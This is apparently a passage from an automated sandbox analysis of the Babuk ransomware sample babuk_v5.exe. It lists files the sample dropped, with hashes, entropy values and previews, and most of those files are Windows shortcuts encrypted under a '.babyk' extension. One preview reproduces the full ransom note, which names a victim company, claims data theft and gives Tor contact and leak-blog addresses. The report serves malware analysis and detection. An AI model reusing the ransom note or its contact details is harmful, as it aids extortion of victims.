                                                                            Preview: .3.y..>....y..!...YNN..ph;.Eb....,v-.....'..H0cxCP?......_X7.z........Y1.@.......{..O.k.S..r.s.X.B/6#..*...B.0..D..q$..T..i..,y.p.~.....choung dong looks like hot dog!!
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1280
                                                                            Entropy (8bit):7.83946483066541
                                                                            Encrypted:false
                                                                            SSDEEP:24:0DFxdOILSgKoV37ireS9fK36P51vb5n/qZk6Ket9PpZYqbRJ8:0DPdygKuqdK3m7vb5n/s5nbPpZjL8
                                                                            MD5:4F911E4C9756E7E0C8BCB776A6530BEF
                                                                            SHA1:541DC8B545624329A7B2A923FB887C3857789C94
                                                                            SHA-256:E94BD69F804761CA868EB10212E4C391F32EC58A158A24DF2ACD2CF1D80F7812
                                                                            SHA-512:5C933BCCC7E9C11A6E469C7643F22A3D75D77E3F6F0A5B1FB59FEAFC8890619474917A46C1B214BB76C87DE635E4F594E383199FBEC3B90AFA469431208E8DBB
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Mail Recipient.MAPIMail.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):172
                                                                            Entropy (8bit):6.532134231784522
                                                                            Encrypted:false
                                                                            SSDEEP:3:zhr1qwI1ttbTJ9/t6hCjOuPLgr0whhWiXOdOutLyKCMBjiIpxKLUxNvEEn:1cFTTb+3r0wCWOdXs/MBPTKL0vtn
                                                                            MD5:B5569F089F7ECC95FCB835998E8BE9AE
                                                                            SHA1:AD83B5C7D89FF9E21877C42DCF998E0ABFB67C9D
                                                                            SHA-256:B4F6E60032E5E02EEA619C79F6168ECB441CF60DDA783E247D1ED00D344F0400
                                                                            SHA-512:E30407088E2193894C623A20CF671094D01FCBFFC1160543881BE6D565BD977A718E942DD8A2D6DD09623369F3C1C62D1705F28E6BC46E969A7C8865927B6EC4
                                                                            Malicious:false
                                                                            Preview: ..?......P8M.lc1!..A...{W..N.......p..+K...N..T(....+6e..N.E.'...!-..SRT.@K...:..#\s.......}ya.C..x.1i...o_..,$.3...k......+.....choung dong looks like hot dog!!
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1274
                                                                            Entropy (8bit):7.841501897245671
                                                                            Encrypted:false
                                                                            SSDEEP:24:NsIziAHTDmInlMOg2INmBuWpoi3d4G6DjHezfubIMZ2tV5dlfUG:NgATD/lZfimBpoS4vsfuU1t5lf
                                                                            MD5:2E0369BBF7B9360F9662CA6BE50579B1
                                                                            SHA1:1765BE7868C94891C5E568D4F5B51977C92F5A42
                                                                            SHA-256:85CF0942E8E96CBFBE236051AA9762E5A3A75F3377AD431719ED5FCE2BE83737
                                                                            SHA-512:405390A9098DFD49AEFD29DC21D78E1CFECA97FAC3801CE52CE20EA280E8BD64108476FE1F746FA190818A16E3DFF2D119F377EEAB9B68A9CBA11910F174A2B2
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1276
                                                                            Entropy (8bit):7.832141356910329
                                                                            Encrypted:false
                                                                            SSDEEP:24:FJLkMhQ1EBrj9Va9toGNB0J3mKXdbBlZe2rzFsPW2UWM:TLky9Su3mKXdfZe6FsuB
                                                                            MD5:8A652956061C57CEC03439009F1C0CEA
                                                                            SHA1:8E82005030C1492BB13555D7C99D0B82FC78B89E
                                                                            SHA-256:35AD3A9978D0C56869B1D73B20A1871A524BC12F48E6A365CB4AA4FC12A253F9
                                                                            SHA-512:8D38110D9EED2BAC5A5CD5B80E5D58340B192BD592434AB36CEAD89310EFF91B7E06B1813DBA3FD82BCBE48A8AD76C9BA8967158EA0502AAA8FD7A5F3200FFC0
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1274
                                                                            Entropy (8bit):7.857344706509644
                                                                            Encrypted:false
                                                                            SSDEEP:24:j4JDgE9CkHGVzh0KRFGkVPe9h/N+NRSA1RBTILO5V5buBZpxzMS7:jmjCsGF7GYef/8RT9UC7uBZQg
                                                                            MD5:E30073E44A5D81975E768A21D76233D1
                                                                            SHA1:B60423D9B1873C9E3D60D66B223561E879F742CE
                                                                            SHA-256:273AAA8977413DAF29E318FF05C7EB631E4FD0C07AB4B440B132C4B869D2A55A
                                                                            SHA-512:48E9E500088992B4B3BF4DFF2901BC3A30F483AE57BC54DFA41EA2D6F3AE0DD5C61711BC595CE389791071853E69FDD9E7209075C07B7887DC5D64B74CFCD41C
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1326
                                                                            Entropy (8bit):7.848122848078152
                                                                            Encrypted:false
                                                                            SSDEEP:24:a41pIgJCelOvzhAz4A6TcvtYmY/XpSr3jHx3ZIEfDBuU83u1rQWMTuYahZ:a41mMCelOvzGzecFiUr31CE4NuhQPTXO
                                                                            MD5:36E61941673DC14A5D60C2D460956DFD
                                                                            SHA1:094CB52ECA2DEF4F28EDB4AFEFA25863D0E8DFA0
                                                                            SHA-256:2AF2DAF49E456E7CC3DEE9156B404759725ED7064003442F302D5088143CC6E7
                                                                            SHA-512:4330B52DDE44DA3972E44D9A8A59323451FFC289CD13331E031D3E7277294CCEFF4A1BAA4858FB389429410BF24D7E03737AD04F1609E6FDF4E53AC1F9F0AD62
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1310
                                                                            Entropy (8bit):7.836666433059391
                                                                            Encrypted:false
                                                                            SSDEEP:24:mWtPZD3RxEE1VtjU+kcsiV1sioHORydr22i1aTJqFNHabHwAWNvKrJW+2EZFKs:RpBn1VtjlRhRyE2iI1c2wnWJRDT
                                                                            MD5:4AD04036421BEB60C67D5A97F1FAF3FB
                                                                            SHA1:82E8B7A556EB6F46B6ED1B79AEECB3D072BC1F70
                                                                            SHA-256:39CD4A0D5F6BEB8910B1F6C65ADEFEE6ABFE1A398501A2BA6FA110DD7A310CBD
                                                                            SHA-512:60507A7A88192EDF69672F8275A02F316607FAEC5C255136DA335A03360C1E9AD6ABA33118F904FADA5A08253564D6D9756AB62B58F93D51FF076707D4E25557
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):573
                                                                            Entropy (8bit):7.599392510100553
                                                                            Encrypted:false
                                                                            SSDEEP:12:2hRwOfvU6BMFwGR/fyQv8xrBX3ZvuAY6+8ZW2V7Q0EMC5lKL4id2D:2H7UkKPjqnZvuKows5lsO
                                                                            MD5:7956B6E2E6F546191D09437379A4FF5D
                                                                            SHA1:3E7E4A008FAB16ADE7C95C3CDDEFFCD5D45BA36B
                                                                            SHA-256:00A19A6E73CA7E30F3E453DFDCD79FC097ED51FAFB9E6D7EFAE732FC4F1E3A3B
                                                                            SHA-512:8F30CE9432101C169DACA7CA3A8C742BB858A92AFDD342CC9214BCD8C01A82BD5D8521040FF37623576DDC7E6BC0BB0D31F8BA50F1B1283A1182FE30CDF7850A
                                                                            Malicious:false
                                                                            Preview: .lq....v.?.....{...q.R!...TH....kei...KBp..h`..M.:.w.....U`s.~A..r(..-..X....r.sw...........+rs...%...7..C)..Hd._...x....).....^..H1.H..w.Fz.U....M....>....{......t..+d.s..ik....v.l.H.5....7...$.o..5M..|r\.87.}~-..wzFA.p..f...e.m`.E,#.........Qi..n..8...1.F#..>(0...;.?x...J...G5.>.D.,.i....s..K.v...z..D6...N...C...../}.u...G..r.y...Xd..zl..s.`?q..x/....\j...W..t..M..+UE..c..vz.E.I._.c....:.s5"...v.[.Z....Q......b7--.V..eG..,..p.t..2.p..J.s..9.x..a&..;.....dP..Wd<...:..,-....W"?......9....#....q.i.......m......choung dong looks like hot dog!!
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\File Explorer.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):575
                                                                            Entropy (8bit):7.639694268014616
                                                                            Encrypted:false
                                                                            SSDEEP:12:Po2TL/uappwx4MuVLxDpWZamLgNh/dRxPishmKwq/R:PPXC4/iT8Nh/dRBishpp
                                                                            MD5:97610A583C98C0A082A84BFBCEB69E40
                                                                            SHA1:9B74443E8892FF162C85DFDF68F96EAFA09004FC
                                                                            SHA-256:BEEBAD65906E02FD2A42C41DC13C274B99ADEEB2E2D6EEF1EF042956438ABC91
                                                                            SHA-512:2D158492DCE31B8C1811ED1412CDE51D5FAC65FEEB311DC49C00C0BDF88EEC50864CA7FFBF43A422D3FC4574704CE21AAEFB0178ABFE306F5E80247AFEC4F6B3
                                                                            Malicious:false
                                                                            Preview: 0.$...|..r....D".........c..|!.E....i...i..7.Q.&'..J.*L:m....~..n./....[.r.G...!.Eb.F.A.m _...>..z..J...A....X.$H...?|....w.e[.bbK.l....q.~1....._..Z.4#\...n_.J..[N.w..2'.@.*.U.=s....%.Kj..........M.P............@).v.3^.(>.o..%.[...[..m.-..K...x.......P.D..V....T..S.....*>("v...G......4..U.yZ.+..6.Kj.....t.Jp...1."..]?..%..T,sz.d4.-......_..H......Y..\=D..n..aY.M.%.A.e.'R.I.....?D.?....*...-..=.....s~.-.)X.w..).(i....(..3.Y...&Z....O(...........t^......g\$..<...a.j<........P...n.r..*c..|r.....G.../U.....choung dong looks like hot dog!!
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):577
                                                                            Entropy (8bit):7.6390086695897805
                                                                            Encrypted:false
                                                                            SSDEEP:12:xCs52flLcORKzXuZPVOiQ044rDkPgz3bVysMKUwTTqVHcDRqMi0s:RILlRKzXsV1rMPWV3cwTTo2Bw
                                                                            MD5:8F2159943E648B890B89AF3274E677B5
                                                                            SHA1:BD2869B32209DBE4DE663510838EB6C2AAC145CE
                                                                            SHA-256:AD270266219A469EB3C4E8F87C922750387A6694CAC50EB2B4F2C5FA1110F652
                                                                            SHA-512:F9DFC5E6A8A65ED87848E010D18B0DD96E2F15C60009FFF3711889C24EE3C5D51711500D0BE20DA912163BE0E0E5B604B9061326DBC9DCBA1DB2BB626B916C6E
                                                                            Malicious:false
                                                                             Preview: [non-printable binary data] choung dong looks like hot dog!!
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\computer.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):503
                                                                            Entropy (8bit):7.526569841887495
                                                                            Encrypted:false
                                                                            SSDEEP:12:gt93E3wj3ZE5dH3qpWcJyqmNLtI9FF1Pcnif0ZZ:gn3v6H6scABTwcifC
                                                                            MD5:7E5CACBC57BAB2B22588C5E4C1BFD394
                                                                            SHA1:44DD618C316D4756CF77248A0C534C9A990B122A
                                                                            SHA-256:18CCAFF5595A8E3119928E297B3EB474041355E2CA5E80DB23BCC9BCB4C07D67
                                                                            SHA-512:DB7566766EBFAF6C8258474477B0CB55B1E2404E4E7E7DB580A0400B95F32861FE9E9F8055BE768D17AC1E0FB70919C927FE451764CED70FAD205D4836276EEF
                                                                            Malicious:false
                                                                             Preview: [non-printable binary data] choung dong looks like hot dog!!
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):2662
                                                                            Entropy (8bit):7.919052237953245
                                                                            Encrypted:false
                                                                            SSDEEP:48:1yl6hruWYIBpty+oAWKe6YXOdnbETbF/7wlSwzeLtUpaHrm/+4NTE8+P/8nI:wUhrUEFRW3KdnboFz8St9yyvz
                                                                            MD5:92AEE9955DAAB207030BD904A7ED7126
                                                                            SHA1:C9F2247057571989149FE7FF043BC5AC332903E2
                                                                            SHA-256:120D77DF96030A496C2534FABDD1EC81E859A697494413D1A17798E93E4A3422
                                                                            SHA-512:376BD6CAEE8D58FFB763E337096B6DA3396D722537F873A2755DA2B3AE6FBFD8E60B3C512080D5AEBF52D3B4079EBEF26238611164065C9EB5986BDE149592AC
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1442
                                                                            Entropy (8bit):7.85925512350611
                                                                            Encrypted:false
                                                                            SSDEEP:24:I82DMUI4JysdC+rljdGZ98GfKFfbpNseSDOCoCnMK4cZ+zhil1blZQNAkJod0vC:h2DJzCPhGAeSDGCnMKNQhiTP8AkJodD
                                                                            MD5:962B434F7CC1E959472E896C26C7CB5A
                                                                            SHA1:9C88222CE4424535D3BC9FF3FD0BB83E8E6E578D
                                                                            SHA-256:3B962BE6E967DDED6CF887D04F75728FAF1C7CB95CD358983B833C9EE705BE89
                                                                            SHA-512:7D74AAA726FFFE4FEF84074450AB6183870E870C0157029DAB73F91D88A944BD28C02AF33A1A8D881879E0DC90DE5512EE0F7DEBA277AA8C3690880FEB466FCE
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1442
                                                                            Entropy (8bit):7.858766803807557
                                                                            Encrypted:false
                                                                            SSDEEP:24:S2mdN6fcB7zqNzg7lJz4fQVsXIG9rvoYM9RCgLChANl50EdLhwrH8C7RMPRLo88L:S2LcRzqN0cQELSAAj59BnUMZLTvUYX76
                                                                            MD5:ACDA8E06467AAB2CDCDC3C3844BF30DF
                                                                            SHA1:26085B815F2DFE2080CDAD47FCC8614A61A8D617
                                                                            SHA-256:A0F1CB9EA996A2C04CB96BAA2A4C9B9489221DB0FAB006A0D8D9E8BF95699FBC
                                                                            SHA-512:3EE38AE319B5AE9FCFDD1A508D0141418F114AE27ED9899374EBAA015BCFD69227EEAA8A017485581FC83263DCD64DEC447EAEE8A650C7788178D31D2FBB60F1
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):2662
                                                                            Entropy (8bit):7.936880602845185
                                                                            Encrypted:false
                                                                            SSDEEP:48:d4HRm/7vq52RAe0jgygPJ+/Bu3zPaCHpYg9yQrtJm8Luuh7ZSx8r9ohDJ:dI0F2gygPJ8E3lCNStJVuuhVS+RohDJ
                                                                            MD5:624FB903A479D44709481F28227BE18A
                                                                            SHA1:847C2A331934024A5EFC027BEEFE7EC0A17ABC0C
                                                                            SHA-256:7FE1DB94220D0D7B667CC4EABB54B0FFFC0BF7BE9C940315E33B30D83BD9F33B
                                                                            SHA-512:AF82DC55BD9ADE06A7D24AA4095E859CC3C7650E3E5CE30DED3CB001FED376F9356BB92239B36BC060087B42185844EB4BA79F70AA7A3E870F05ADF230F8BAB1
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\Desktop\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\Documents\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\Downloads\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\Favorites\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
